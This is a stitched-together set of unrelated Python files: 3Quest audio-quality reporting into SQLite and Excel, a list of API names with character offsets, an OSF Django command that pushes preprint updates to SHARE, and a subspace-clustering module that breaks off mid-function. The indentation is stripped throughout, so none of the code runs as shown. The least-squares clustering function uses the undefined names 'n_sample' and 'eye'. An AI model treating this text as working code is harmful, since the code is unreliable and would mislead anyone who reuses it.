def create3Qreport(data, local_time, opt_verbose='OFF'):
for i,_3quest in enumerate(data["3Quest"]):
# Check path if exists or not
if(os.path.isdir(os.path.join(data["3Quest"][i]['path_dut']+'.3quest', 'Results'))):
'''
0th path_dut_3quest:..\logs\boommic_SWout\dut.3quest\Results
1th path_dut_3quest:..\logs\Intermic_SWin\dut.3quest\Results
'''
path_dut_3quest_results = os.path.join(data["3Quest"][i]['path_dut']+'.3quest', 'Results')
msg = '{}th path_dut_3quest_results:{}'
logger.info(msg.format(i, path_dut_3quest_results) )
file_type="*.csv"
ret_list_3questFolder_CsvFiles = walk_in_dir(path_dut_3quest_results,file_type)
local_csvdata_analysis = csvdata_analysis.CSVDataAnalysis(dirnamelog,\
path_dut_3quest_results,\
ret_list_3questFolder_CsvFiles
)
local_csvdata_analysis.read_CSVFile()
tmp_csv=local_csvdata_analysis.write_CSVFile_del1strow()
# copy tmp.csv to output.csv of 3Quest Result Path
local_csvdata_analysis.copy_CSVFile_to3questResultPath(tmp_csv,\
local_csvdata_analysis._3questfolder_csvfiles)
local_csvdata_analysis = csvdata_analysis.PandasDataAnalysis(dirnamelog,\
path_dut_3quest_results,\
ret_list_3questFolder_CsvFiles
)
# get list of all background noise 3Quest value
list_allnoises_3quest_values = local_csvdata_analysis.parse_CSVFile_02()
# prepare dut_foldername, insert_date, insert_time
path_dut = os.path.dirname(data["3Quest"][i]['path_dut'])
str_split=os.path.split(path_dut)
dut_foldername=str_split[1]
insert_date = str(local_time.tm_year)+str("{:02d}".format(local_time.tm_mon) )+str("{:02d}".format(local_time.tm_mday))
insert_time = str("{:02d}".format(local_time.tm_hour))+':'+str("{:02d}".format(local_time.tm_min))+':'+str("{:02d}".format(local_time.tm_sec))
# Ready to store 3Quest data to DB
if platform.system().lower() == 'windows': db_name_3quest = '3QuestDB.db'
if platform.system().lower() == 'linux': db_name_3quest = '3QuestDB_tensor4.db'
path_db = os.path.join(dirnamelog,db_name_3quest)
if opt_verbose.lower() == "on":
msg = "path_db: {}"
logger.info(msg.format(path_db))
localdb_sqlite = db_sqlite.DB_sqlite(path_db,\
dut_foldername,insert_date,insert_time,\
path_dut,\
opt_verbose)
# create a database connection
conn = localdb_sqlite.create_connection()
if conn is not None:
# create projects table
localdb_sqlite.create_all_tables_3Quest(conn)
else:
print("Error! cannot create the database connection.")
# Insert noise type data to DB
localdb_sqlite.insert_noise_file_tosqlite(localdb_sqlite, conn)
# Insert dut path data to DB to prevent 3Quest data redundancy
number_of_rows_3Quest_path = localdb_sqlite.insert_3quest_path_tosqlite(localdb_sqlite, conn)
if number_of_rows_3Quest_path < 1:# Insert if not exists
for list_noises_3quest_values in list_allnoises_3quest_values:
'''
INFO: list_noises_3quest_values:[['pub', 'pub', 'pub', 'pub'], ['SMOS', 'NMOS', 'GMOS', 'delta_SNR'], ['2.840550', '4.154481', '2.914813', '29.453750']]
INFO: list_noises_3quest_values:[['AVG', 'AVG', 'AVG', 'AVG'], ['SMOS', 'NMOS', 'GMOS', 'delta_SNR'], ['3.358136', '4.220144', '3.328679', '24.638061']]
'''
#Insert list_noises_3quest_values data into sqlite
localdb_sqlite.insert_csv_data_tosqlite(list_noises_3quest_values, \
localdb_sqlite, \
conn)
# create dataframe by SQL for excel report
localdb_sqlite.query_3quest_table(localdb_sqlite, conn)
# write dataframe to excel
localdb_sqlite.write_to_excel()
# We can also close the connection if we are done with it.
# Just be sure any changes have been committed or they will be lost.
conn.close()
def test_create3Qreport_wonobgn_reAverage(data, local_time, opt_verbose='OFF'):
for i,_ in enumerate(data["3Quest"]):
# Check path if exists or not
if(os.path.isdir(os.path.join(data["3Quest"][i]['path_dut']+'.3quest', 'Results'))):
# prepare dut_foldername, insert_date, insert_time
path_dut = os.path.dirname(data["3Quest"][i]['path_dut'])
str_split=os.path.split(path_dut)
dut_foldername=str_split[1]
#insert_date = str(local_time.tm_year)+str("{:02d}".format(local_time.tm_mon) )+str("{:02d}".format(local_time.tm_mday))
insert_date = '20200713'
insert_time = str("{:02d}".format(local_time.tm_hour))+':'+str("{:02d}".format(local_time.tm_min))+':'+str("{:02d}".format(local_time.tm_sec))
# Ready to store 3Quest data to DB
if platform.system().lower() == 'windows': db_name_3quest = '3QuestDB.db'
if platform.system().lower() == 'linux': db_name_3quest = '3QuestDB_tensor4.db'
path_db = os.path.join(dirnamelog,db_name_3quest)
if opt_verbose.lower() == "on":
msg = "path_db: {}"
logger.info(msg.format(path_db))
localdb_sqlite = db_sqlite.DB_sqlite(path_db,\
dut_foldername,insert_date,insert_time,\
path_dut,\
opt_verbose)
# create a database connection
conn = localdb_sqlite.create_connection()
if conn is not None:
# create projects table
localdb_sqlite.create_all_tables_3Quest(conn)
else:
print("Error! cannot create the database connection.")
# Insert noise type data to DB
#localdb_sqlite.insert_noise_file_tosqlite(localdb_sqlite, conn)
# Insert dut path data to DB to prevent 3Quest data redundancy
#number_of_rows_3Quest_path = localdb_sqlite.insert_3quest_path_tosqlite(localdb_sqlite, conn)
#if number_of_rows_3Quest_path < 1:# Insert if not exists
# for list_noises_3quest_values in list_allnoises_3quest_values:
# '''
# INFO: list_noises_3quest_values:[['pub', 'pub', 'pub', 'pub'], ['SMOS', 'NMOS', 'GMOS', 'delta_SNR'], ['2.840550', '4.154481', '2.914813', '29.453750']]
# INFO: list_noises_3quest_values:[['AVG', 'AVG', 'AVG', 'AVG'], ['SMOS', 'NMOS', 'GMOS', 'delta_SNR'], ['3.358136', '4.220144', '3.328679', '24.638061']]
# '''
#Insert list_noises_3quest_values data into sqlite
# localdb_sqlite.insert_csv_data_tosqlite(list_noises_3quest_values, \
# localdb_sqlite, \
# conn)
# create dataframe by SQL for excel report
# localdb_sqlite.query_3quest_table_nobgnOnly(localdb_sqlite, conn)
# localdb_sqlite.query_3quest_table_withoutnobgn(localdb_sqlite, conn)
# write dataframe to excel
#localdb_sqlite.write_to_excel()
# test purpose
localdb_sqlite.query_3quest_table_nobgnOnly(localdb_sqlite, conn)
localdb_sqlite.query_3quest_table_withoutnobgn(localdb_sqlite, conn)
path_report_excel = os.path.join(path_dut, dut_foldername+'.xlsx')
df_3quest_table_excel= localdb_sqlite.df_query_3quest_table_noise.iloc [0:11, 1:8]
localdb_sqlite.write_to_excel_fromdata(path_report_excel,df_3quest_table_excel)
# We can also close the connection if we are done with it.
# Just be sure any changes have been committed or they will be lost.
conn.close()
def create3Qreport_wonobgn_reAverage(data, local_time, opt_verbose='OFF'):
for i,_3quest in enumerate(data["3Quest"]):
# Check path if exists or not
if(os.path.isdir(os.path.join(data["3Quest"][i]['path_dut']+'.3quest', 'Results'))):
'''
0th path_dut_3quest:..\logs\boommic_SWout\dut.3quest\Results
1th path_dut_3quest:..\logs\Intermic_SWin\dut.3quest\Results
'''
path_dut_3quest_results = os.path.join(data["3Quest"][i]['path_dut']+'.3quest', 'Results')
msg = '{}th path_dut_3quest_results:{}'
logger.info(msg.format(i, path_dut_3quest_results) )
file_type="*.csv"
ret_list_3questFolder_CsvFiles = walk_in_dir(path_dut_3quest_results,file_type)
local_csvdata_analysis = csvdata_analysis.CSVDataAnalysis(dirnamelog,\
path_dut_3quest_results,\
ret_list_3questFolder_CsvFiles
)
local_csvdata_analysis.read_CSVFile()
tmp_csv=local_csvdata_analysis.write_CSVFile_del1strow()
# copy tmp.csv to output.csv of 3Quest Result Path
local_csvdata_analysis.copy_CSVFile_to3questResultPath(tmp_csv,\
local_csvdata_analysis._3questfolder_csvfiles)
local_csvdata_analysis = csvdata_analysis.PandasDataAnalysis(dirnamelog,\
path_dut_3quest_results,\
ret_list_3questFolder_CsvFiles
)
# get list of all background noise 3Quest value
list_allnoises_3quest_values = local_csvdata_analysis.parse_CSVFile_02()
# prepare dut_foldername, insert_date, insert_time
path_dut = os.path.dirname(data["3Quest"][i]['path_dut'])
str_split=os.path.split(path_dut)
dut_foldername=str_split[1]
insert_date = str(local_time.tm_year)+str("{:02d}".format(local_time.tm_mon) )+str("{:02d}".format(local_time.tm_mday))
insert_time = str("{:02d}".format(local_time.tm_hour))+':'+str("{:02d}".format(local_time.tm_min))+':'+str("{:02d}".format(local_time.tm_sec))
# Ready to store 3Quest data to DB
if platform.system().lower() == 'windows': db_name_3quest = '3QuestDB.db'
if platform.system().lower() == 'linux': db_name_3quest = '3QuestDB_tensor4.db'
path_db = os.path.join(dirnamelog,db_name_3quest)
if opt_verbose.lower() == "on":
msg = "path_db: {}"
logger.info(msg.format(path_db))
localdb_sqlite = db_sqlite.DB_sqlite(path_db,\
dut_foldername,insert_date,insert_time,\
path_dut,\
opt_verbose)
# create a database connection
conn = localdb_sqlite.create_connection()
if conn is not None:
# create projects table
localdb_sqlite.create_all_tables_3Quest(conn)
else:
print("Error! cannot create the database connection.")
# Insert noise type data to DB
localdb_sqlite.insert_noise_file_tosqlite(localdb_sqlite, conn)
# Insert dut path data to DB to prevent 3Quest data redundancy
number_of_rows_3Quest_path = localdb_sqlite.insert_3quest_path_tosqlite(localdb_sqlite, conn)
if number_of_rows_3Quest_path < 1:# Insert if not exists
for list_noises_3quest_values in list_allnoises_3quest_values:
'''
INFO: list_noises_3quest_values:[['pub', 'pub', 'pub', 'pub'], ['SMOS', 'NMOS', 'GMOS', 'delta_SNR'], ['2.840550', '4.154481', '2.914813', '29.453750']]
INFO: list_noises_3quest_values:[['AVG', 'AVG', 'AVG', 'AVG'], ['SMOS', 'NMOS', 'GMOS', 'delta_SNR'], ['3.358136', '4.220144', '3.328679', '24.638061']]
'''
#Insert list_noises_3quest_values data into sqlite
localdb_sqlite.insert_csv_data_tosqlite(list_noises_3quest_values, \
localdb_sqlite, \
conn)
# create dataframe by SQL for excel report
localdb_sqlite.query_3quest_table_nobgnOnly(localdb_sqlite, conn)
localdb_sqlite.query_3quest_table_withoutnobgn(localdb_sqlite, conn)
path_report_excel = os.path.join(path_dut, dut_foldername+'.xlsx')
# write dataframe to excel
df_3quest_table_excel= localdb_sqlite.df_query_3quest_table_noise.iloc [0:11, 1:8]
localdb_sqlite.write_to_excel_fromdata(path_report_excel,df_3quest_table_excel)
# We can also close the connection if we are done with it.
# Just be sure any changes have been committed or they will be lost.
conn.close()
| [
"db_sqlite.DB_sqlite",
"csvdataAnalysis.CSVDataAnalysis",
"os.path.join",
"csvdataAnalysis.PandasDataAnalysis",
"os.path.split",
"os.path.isfile",
"os.path.dirname",
"platform.system",
"os.path.abspath",
"sys.path.append"
] | [((390, 415), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (405, 415), False, 'import os, sys, time, platform\n'), ((427, 454), 'os.path.dirname', 'os.path.dirname', (['strabspath'], {}), '(strabspath)\n', (442, 454), False, 'import os, sys, time, platform\n'), ((465, 490), 'os.path.split', 'os.path.split', (['strdirname'], {}), '(strdirname)\n', (478, 490), False, 'import os, sys, time, platform\n'), ((527, 559), 'os.path.join', 'os.path.join', (['prevdirname', '"""lib"""'], {}), "(prevdirname, 'lib')\n", (539, 559), False, 'import os, sys, time, platform\n'), ((570, 603), 'os.path.join', 'os.path.join', (['prevdirname', '"""logs"""'], {}), "(prevdirname, 'logs')\n", (582, 603), False, 'import os, sys, time, platform\n'), ((603, 630), 'sys.path.append', 'sys.path.append', (['dirnamelib'], {}), '(dirnamelib)\n', (618, 630), False, 'import os, sys, time, platform\n'), ((1398, 1442), 'os.path.isfile', 'os.path.isfile', (["data['3Quest'][i]['mic_dut']"], {}), "(data['3Quest'][i]['mic_dut'])\n", (1412, 1442), False, 'import os, sys, time, platform\n'), ((1461, 1510), 'os.path.isfile', 'os.path.isfile', (["data['3Quest'][i]['mic_standmic']"], {}), "(data['3Quest'][i]['mic_standmic'])\n", (1475, 1510), False, 'import os, sys, time, platform\n'), ((4792, 4858), 'os.path.join', 'os.path.join', (["(data['3Quest'][i]['path_dut'] + '.3quest')", '"""Results"""'], {}), "(data['3Quest'][i]['path_dut'] + '.3quest', 'Results')\n", (4804, 4858), False, 'import os, sys, time, platform\n'), ((5077, 5143), 'os.path.join', 'os.path.join', (["(data['3Quest'][i]['path_dut'] + '.3quest')", '"""Results"""'], {}), "(data['3Quest'][i]['path_dut'] + '.3quest', 'Results')\n", (5089, 5143), False, 'import os, sys, time, platform\n'), ((5437, 5542), 'csvdataAnalysis.CSVDataAnalysis', 'csvdata_analysis.CSVDataAnalysis', (['dirnamelog', 'path_dut_3quest_results', 'ret_list_3questFolder_CsvFiles'], {}), '(dirnamelog, path_dut_3quest_results,\n ret_list_3questFolder_CsvFiles)\n', (5469, 5542), True, 'import csvdataAnalysis as csvdata_analysis\n'), ((6135, 6243), 'csvdataAnalysis.PandasDataAnalysis', 'csvdata_analysis.PandasDataAnalysis', (['dirnamelog', 'path_dut_3quest_results', 'ret_list_3questFolder_CsvFiles'], {}), '(dirnamelog, path_dut_3quest_results,\n ret_list_3questFolder_CsvFiles)\n', (6170, 6243), True, 'import csvdataAnalysis as csvdata_analysis\n'), ((6644, 6690), 'os.path.dirname', 'os.path.dirname', (["data['3Quest'][i]['path_dut']"], {}), "(data['3Quest'][i]['path_dut'])\n", (6659, 6690), False, 'import os, sys, time, platform\n'), ((6713, 6736), 'os.path.split', 'os.path.split', (['path_dut'], {}), '(path_dut)\n', (6726, 6736), False, 'import os, sys, time, platform\n'), ((7312, 7352), 'os.path.join', 'os.path.join', (['dirnamelog', 'db_name_3quest'], {}), '(dirnamelog, db_name_3quest)\n', (7324, 7352), False, 'import os, sys, time, platform\n'), ((7516, 7613), 'db_sqlite.DB_sqlite', 'db_sqlite.DB_sqlite', (['path_db', 'dut_foldername', 'insert_date', 'insert_time', 'path_dut', 'opt_verbose'], {}), '(path_db, dut_foldername, insert_date, insert_time,\n path_dut, opt_verbose)\n', (7535, 7613), True, 'import db_sqlite as db_sqlite\n'), ((9957, 10023), 'os.path.join', 'os.path.join', (["(data['3Quest'][i]['path_dut'] + '.3quest')", '"""Results"""'], {}), "(data['3Quest'][i]['path_dut'] + '.3quest', 'Results')\n", (9969, 10023), False, 'import os, sys, time, platform\n'), ((10113, 10159), 'os.path.dirname', 'os.path.dirname', (["data['3Quest'][i]['path_dut']"], {}), "(data['3Quest'][i]['path_dut'])\n", (10128, 10159), False, 'import os, sys, time, platform\n'), ((10182, 10205), 'os.path.split', 'os.path.split', (['path_dut'], {}), '(path_dut)\n', (10195, 10205), False, 'import os, sys, time, platform\n'), ((10819, 10859), 'os.path.join', 'os.path.join', (['dirnamelog', 'db_name_3quest'], {}), '(dirnamelog, db_name_3quest)\n', (10831, 10859), False, 'import os, sys, time, platform\n'), ((11023, 11120), 'db_sqlite.DB_sqlite', 'db_sqlite.DB_sqlite', (['path_db', 'dut_foldername', 'insert_date', 'insert_time', 'path_dut', 'opt_verbose'], {}), '(path_db, dut_foldername, insert_date, insert_time,\n path_dut, opt_verbose)\n', (11042, 11120), True, 'import db_sqlite as db_sqlite\n'), ((13420, 13468), 'os.path.join', 'os.path.join', (['path_dut', "(dut_foldername + '.xlsx')"], {}), "(path_dut, dut_foldername + '.xlsx')\n", (13432, 13468), False, 'import os, sys, time, platform\n'), ((14039, 14105), 'os.path.join', 'os.path.join', (["(data['3Quest'][i]['path_dut'] + '.3quest')", '"""Results"""'], {}), "(data['3Quest'][i]['path_dut'] + '.3quest', 'Results')\n", (14051, 14105), False, 'import os, sys, time, platform\n'), ((14324, 14390), 'os.path.join', 'os.path.join', (["(data['3Quest'][i]['path_dut'] + '.3quest')", '"""Results"""'], {}), "(data['3Quest'][i]['path_dut'] + '.3quest', 'Results')\n", (14336, 14390), False, 'import os, sys, time, platform\n'), ((14684, 14789), 'csvdataAnalysis.CSVDataAnalysis', 'csvdata_analysis.CSVDataAnalysis', (['dirnamelog', 'path_dut_3quest_results', 'ret_list_3questFolder_CsvFiles'], {}), '(dirnamelog, path_dut_3quest_results,\n ret_list_3questFolder_CsvFiles)\n', (14716, 14789), True, 'import csvdataAnalysis as csvdata_analysis\n'), ((15382, 15490), 'csvdataAnalysis.PandasDataAnalysis', 'csvdata_analysis.PandasDataAnalysis', (['dirnamelog', 'path_dut_3quest_results', 'ret_list_3questFolder_CsvFiles'], {}), '(dirnamelog, path_dut_3quest_results,\n ret_list_3questFolder_CsvFiles)\n', (15417, 15490), True, 'import csvdataAnalysis as csvdata_analysis\n'), ((15891, 15937), 'os.path.dirname', 'os.path.dirname', (["data['3Quest'][i]['path_dut']"], {}), "(data['3Quest'][i]['path_dut'])\n", (15906, 15937), False, 'import os, sys, time, platform\n'), ((15960, 15983), 'os.path.split', 'os.path.split', (['path_dut'], {}), '(path_dut)\n', (15973, 15983), False, 'import os, sys, time, platform\n'), ((16559, 16599), 'os.path.join', 'os.path.join', (['dirnamelog', 'db_name_3quest'], {}), '(dirnamelog, db_name_3quest)\n', (16571, 16599), False, 'import os, sys, time, platform\n'), ((16763, 16860), 'db_sqlite.DB_sqlite', 'db_sqlite.DB_sqlite', (['path_db', 'dut_foldername', 'insert_date', 'insert_time', 'path_dut', 'opt_verbose'], {}), '(path_db, dut_foldername, insert_date, insert_time,\n path_dut, opt_verbose)\n', (16782, 16860), True, 'import db_sqlite as db_sqlite\n'), ((18827, 18875), 'os.path.join', 'os.path.join', (['path_dut', "(dut_foldername + '.xlsx')"], {}), "(path_dut, dut_foldername + '.xlsx')\n", (18839, 18875), False, 'import os, sys, time, platform\n'), ((7127, 7144), 'platform.system', 'platform.system', ([], {}), '()\n', (7142, 7144), False, 'import os, sys, time, platform\n'), ((7213, 7230), 'platform.system', 'platform.system', ([], {}), '()\n', (7228, 7230), False, 'import os, sys, time, platform\n'), ((10634, 10651), 'platform.system', 'platform.system', ([], {}), '()\n', (10649, 10651), False, 'import os, sys, time, platform\n'), ((10720, 10737), 'platform.system', 'platform.system', ([], {}), '()\n', (10735, 10737), False, 'import os, sys, time, platform\n'), ((16374, 16391), 'platform.system', 'platform.system', ([], {}), '()\n', (16389, 16391), False, 'import os, sys, time, platform\n'), ((16460, 16477), 'platform.system', 'platform.system', ([], {}), '()\n', (16475, 16477), False, 'import os, sys, time, platform\n')] |
from __future__ import unicode_literals
import logging
from django.core.management.base import BaseCommand
from django.db.models import F
from scripts import utils as script_utils
from osf.models import PreprintService
from website.preprints.tasks import on_preprint_updated
logger = logging.getLogger(__name__)
def update_share_preprint_modified_dates(dry_run=False):
for preprint in PreprintService.objects.filter(date_modified__lt=F('node__modified')):
if dry_run:
logger.info('Would have sent ' + preprint._id + ' data to SHARE')
else:
on_preprint_updated(preprint._id)
logger.info(preprint._id + ' data sent to SHARE')
class Command(BaseCommand):
"""
Send more accurate preprint modified dates to SHARE (sends updates if preprint.modified < node.modified)
"""
def add_arguments(self, parser):
super(Command, self).add_arguments(parser)
parser.add_argument(
'--dry',
action='store_true',
dest='dry_run',
help='Say how many preprint updates would be sent to SHARE',
)
def handle(self, *args, **options):
dry_run = options.get('dry_run', False)
if not dry_run:
script_utils.add_file_logger(logger, __file__)
update_share_preprint_modified_dates(dry_run)
| [
"logging.getLogger",
"website.preprints.tasks.on_preprint_updated",
"django.db.models.F",
"scripts.utils.add_file_logger"
] | [((287, 314), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (304, 314), False, 'import logging\n'), ((442, 461), 'django.db.models.F', 'F', (['"""node__modified"""'], {}), "('node__modified')\n", (443, 461), False, 'from django.db.models import F\n'), ((588, 621), 'website.preprints.tasks.on_preprint_updated', 'on_preprint_updated', (['preprint._id'], {}), '(preprint._id)\n', (607, 621), False, 'from website.preprints.tasks import on_preprint_updated\n'), ((1245, 1291), 'scripts.utils.add_file_logger', 'script_utils.add_file_logger', (['logger', '__file__'], {}), '(logger, __file__)\n', (1273, 1291), True, 'from scripts import utils as script_utils\n')] |
import numpy as np
from sklearn.decomposition import PCA
import pandas as pd
import matplotlib.pyplot as plt
import random
import seaborn as sns
from sklearn.cluster import KMeans
from sklearn.metrics import confusion_matrix
from sklearn.metrics.cluster import adjusted_rand_score
from sklearn.datasets import fetch_openml
from sklearn.model_selection import train_test_split
import pandas.util.testing as tm
from keras.datasets import mnist
import tensorflow_datasets as tfds
import tensorflow as tf
from google.colab import files
import sys
import itertools as it
#@title ElasticNetSubspaceClustering
import warnings
import progressbar
import spams
import time
from scipy import sparse
from sklearn import cluster
from sklearn.base import BaseEstimator, ClusterMixin
from sklearn.decomposition import sparse_encode
from sklearn.linear_model import orthogonal_mp
from sklearn.neighbors import kneighbors_graph
from sklearn.preprocessing import normalize
from sklearn.utils import check_random_state, check_array, check_symmetric
class SelfRepresentation(BaseEstimator, ClusterMixin):
def __init__(self, n_clusters=8, affinity='symmetrize', random_state=None, n_init=20, n_jobs=1):
self.n_clusters = n_clusters
self.affinity = affinity
self.random_state = random_state
self.n_init = n_init
self.n_jobs = n_jobs
def fit(self, X, y=None):
X = check_array(X, accept_sparse=['csr', 'csc', 'coo'], dtype=np.float64)
time_base = time.time()
self._self_representation(X)
self.timer_self_representation_ = time.time() - time_base
self._representation_to_affinity()
self._spectral_clustering()
self.timer_time_ = time.time() - time_base
return self
def fit_self_representation(self, X, y=None):
X = check_array(X, accept_sparse=['csr', 'csc', 'coo'], dtype=np.float64)
time_base = time.time()
self._self_representation(X)
self.timer_self_representation_ = time.time() - time_base
return self
def _representation_to_affinity(self):
normalized_representation_matrix_ = normalize(self.representation_matrix_, 'l2')
if self.affinity == 'symmetrize':
self.affinity_matrix_ = 0.5 * (np.absolute(normalized_representation_matrix_) + np.absolute(normalized_representation_matrix_.T))
elif self.affinity == 'nearest_neighbors':
neighbors_graph = kneighbors_graph(normalized_representation_matrix_, 3,
mode='connectivity', include_self=False)
self.affinity_matrix_ = 0.5 * (neighbors_graph + neighbors_graph.T)
def _spectral_clustering(self):
affinity_matrix_ = check_symmetric(self.affinity_matrix_)
random_state = check_random_state(self.random_state)
laplacian = sparse.csgraph.laplacian(affinity_matrix_, normed=True)
_, vec = sparse.linalg.eigsh(sparse.identity(laplacian.shape[0]) - laplacian,
k=self.n_clusters, sigma=None, which='LA')
embedding = normalize(vec)
_, self.labels_, _ = cluster.k_means(embedding, self.n_clusters,
random_state=random_state, n_init=self.n_init)
def active_support_elastic_net(X, y, alpha, tau=1.0, algorithm='spams', support_init='knn',
support_size=100, maxiter=40):
n_samples = X.shape[0]
if n_samples <= support_size: # skip active support search for small scale data
supp = np.arange(n_samples, dtype=int) # this results in the following iteration to converge in 1 iteration
else:
if support_init == 'L2':
L2sol = np.linalg.solve(np.identity(y.shape[1]) * alpha + np.dot(X.T, X), y.T)
c0 = np.dot(X, L2sol)[:, 0]
supp = np.argpartition(-np.abs(c0), support_size)[0:support_size]
elif support_init == 'knn':
supp = np.argpartition(-np.abs(np.dot(y, X.T)[0]), support_size)[0:support_size]
curr_obj = float("inf")
for _ in range(maxiter):
Xs = X[supp, :]
if algorithm == 'spams':
cs = spams.lasso(np.asfortranarray(y.T), D=np.asfortranarray(Xs.T),
lambda1=tau*alpha, lambda2=(1.0-tau)*alpha)
cs = np.asarray(cs.todense()).T
else:
cs = sparse_encode(y, Xs, algorithm=algorithm, alpha=alpha)
delta = (y - np.dot(cs, Xs)) / alpha
obj = tau * np.sum(np.abs(cs[0])) + (1.0 - tau)/2.0 * np.sum(np.power(cs[0], 2.0)) + alpha/2.0 * np.sum(np.power(delta, 2.0))
if curr_obj - obj < 1.0e-10 * curr_obj:
break
curr_obj = obj
coherence = np.abs(np.dot(delta, X.T))[0]
coherence[supp] = 0
addedsupp = np.nonzero(coherence > tau + 1.0e-10)[0]
if addedsupp.size == 0: # converged
break
# Find the set of nonzero entries of cs.
activesupp = supp[np.abs(cs[0]) > 1.0e-10]
if activesupp.size > 0.8 * support_size: # this suggests that support_size is too small and needs to be increased
support_size = min([round(max([activesupp.size, support_size]) * 1.1), n_samples])
if addedsupp.size + activesupp.size > support_size:
ord = np.argpartition(-coherence[addedsupp], support_size - activesupp.size)[0:support_size - activesupp.size]
addedsupp = addedsupp[ord]
supp = np.concatenate([activesupp, addedsupp])
c = np.zeros(n_samples)
c[supp] = cs
return c
def elastic_net_subspace_clustering(X, gamma=50.0, gamma_nz=True, tau=1.0, algorithm='lasso_lars',
active_support=True, active_support_params=None, n_nonzero=50):
if algorithm in ('lasso_lars', 'lasso_cd') and tau < 1.0 - 1.0e-10:
warnings.warn('algorithm {} cannot handle tau smaller than 1. Using tau = 1'.format(algorithm))
tau = 1.0
if active_support == True and active_support_params == None:
active_support_params = {}
n_samples = X.shape[0]
rows = np.zeros(n_samples * n_nonzero)
cols = np.zeros(n_samples * n_nonzero)
vals = np.zeros(n_samples * n_nonzero)
curr_pos = 0
for i in progressbar.progressbar(range(n_samples)):
y = X[i, :].copy().reshape(1, -1)
X[i, :] = 0
if algorithm in ('lasso_lars', 'lasso_cd', 'spams'):
if gamma_nz == True:
coh = np.delete(np.absolute(np.dot(X, y.T)), i)
alpha0 = np.amax(coh) / tau # value for which the solution is zero
alpha = alpha0 / gamma
else:
alpha = 1.0 / gamma
if active_support == True:
c = active_support_elastic_net(X, y, alpha, tau, algorithm, **active_support_params)
else:
if algorithm == 'spams':
c = spams.lasso(np.asfortranarray(y.T), D=np.asfortranarray(X.T),
lambda1=tau * alpha, lambda2=(1.0-tau) * alpha)
c = np.asarray(c.todense()).T[0]
else:
c = sparse_encode(y, X, algorithm=algorithm, alpha=alpha)[0]
else:
warnings.warn("algorithm {} not found".format(algorithm))
index = np.flatnonzero(c)
if index.size > n_nonzero:
# warnings.warn("The number of nonzero entries in sparse subspace clustering exceeds n_nonzero")
index = index[np.argsort(-np.absolute(c[index]))[0:n_nonzero]]
rows[curr_pos:curr_pos + len(index)] = i
cols[curr_pos:curr_pos + len(index)] = index
vals[curr_pos:curr_pos + len(index)] = c[index]
curr_pos += len(index)
X[i, :] = y
# affinity = sparse.csr_matrix((vals, (rows, cols)), shape=(n_samples, n_samples)) + sparse.csr_matrix((vals, (cols, rows)), shape=(n_samples, n_samples))
return sparse.csr_matrix((vals, (rows, cols)), shape=(n_samples, n_samples))
class ElasticNetSubspaceClustering(SelfRepresentation):
def __init__(self, n_clusters=8, affinity='symmetrize', random_state=None, n_init=20, n_jobs=1, gamma=50.0, gamma_nz=True, tau=1.0,
algorithm='lasso_lars', active_support=True, active_support_params=None, n_nonzero=50):
self.gamma = gamma
self.gamma_nz = gamma_nz
self.tau = tau
self.algorithm = algorithm
self.active_support = active_support
self.active_support_params = active_support_params
self.n_nonzero = n_nonzero
SelfRepresentation.__init__(self, n_clusters, affinity, random_state, n_init, n_jobs)
def _self_representation(self, X):
self.representation_matrix_ = elastic_net_subspace_clustering(X, self.gamma, self.gamma_nz,
self.tau, self.algorithm,
self.active_support, self.active_support_params,
self.n_nonzero)
def sparse_subspace_clustering_orthogonal_matching_pursuit(X, n_nonzero=10, thr=1.0e-6):
n_samples = X.shape[0]
rows = np.zeros(n_samples * n_nonzero, dtype = int)
cols = np.zeros(n_samples * n_nonzero, dtype = int)
vals = np.zeros(n_samples * n_nonzero)
curr_pos = 0
for i in progressbar.progressbar(range(n_samples)):
# for i in range(n_samples):
residual = X[i, :].copy() # initialize residual
supp = np.empty(shape=(0), dtype = int) # initialize support
residual_norm_thr = np.linalg.norm(X[i, :]) * thr
for t in range(n_nonzero): # for each iteration of OMP
# compute coherence between residuals and X
coherence = abs( np.matmul(residual, X.T) )
coherence[i] = 0.0
# update support
supp = np.append(supp, np.argmax(coherence))
# compute coefficients
c = np.linalg.lstsq( X[supp, :].T, X[i, :].T, rcond=None)[0]
# compute residual
residual = X[i, :] - np.matmul(c.T, X[supp, :])
# check termination
if np.sum(residual **2) < residual_norm_thr:
break
rows[curr_pos:curr_pos + len(supp)] = i
cols[curr_pos:curr_pos + len(supp)] = supp
vals[curr_pos:curr_pos + len(supp)] = c
curr_pos += len(supp)
# affinity = sparse.csr_matrix((vals, (rows, cols)), shape=(n_samples, n_samples)) + sparse.csr_matrix((vals, (cols, rows)), shape=(n_samples, n_samples))
return sparse.csr_matrix((vals, (rows, cols)), shape=(n_samples, n_samples))
class SparseSubspaceClusteringOMP(SelfRepresentation):
def __init__(self, n_clusters=8, affinity='symmetrize', random_state=None, n_init=10, n_jobs=1, n_nonzero=10, thr=1.0e-6):
self.n_nonzero = n_nonzero
self.thr = thr
SelfRepresentation.__init__(self, n_clusters, affinity, random_state, n_init, n_jobs)
def _self_representation(self, X):
self.representation_matrix_ = sparse_subspace_clustering_orthogonal_matching_pursuit(X, self.n_nonzero, self.thr)
def least_squares_subspace_clustering(X, gamma=10.0, exclude_self=False):
n_samples, n_features = X.shape
if exclude_self == False:
if n_samples < n_features:
gram = np.matmul(X, X.T)
return np.linalg.solve(gram + np.eye(n_sample) / gamma, gram).T
else:
tmp = np.linalg.solve(np.matmul(X.T, X) + np.eye(n_features) / gamma, X.T)
return np.matmul(X, tmp).T
else:
if n_samples < n_features:
D = np.linalg.solve(np.matmul(X, X.T) + np.eye(n_sample) / gamma, np.eye(n_sample))
# see Theorem 6 in https://arxiv.org/pdf/1404.6736.pdf
else:
tmp = np.linalg.solve(np.matmul(X.T, X) + np.eye(n_features) / gamma, X.T)
D = eye(n_samples) - np.matmul(X, tmp)
D = D / D.diagonal()[None,:]
np.fill_diagonal(D, 0.0)
return -1.0 * D.T
class LeastSquaresSubspaceClustering(SelfRepresentation):
def __init__(self, n_clusters=8, affinity='symmetrize', random_state=None, n_init=None, n_jobs=1, gamma=10.0, exclude_self=False):
self.gamma = gamma
self.exclude_self = exclude_self
SelfRepresentation.__init__(self, n_clusters, affinity, random_state, n_init, n_jobs)
def _self_representation(self, X):
self.representation_matrix_ = least_squares_subspace_clustering(X, self.gamma, self.exclude_self)
if 'google.colab' in sys.modules:
uploaded = files.upload()
#subtract the mean from every class
def preprocess_substract_mean(X, y):
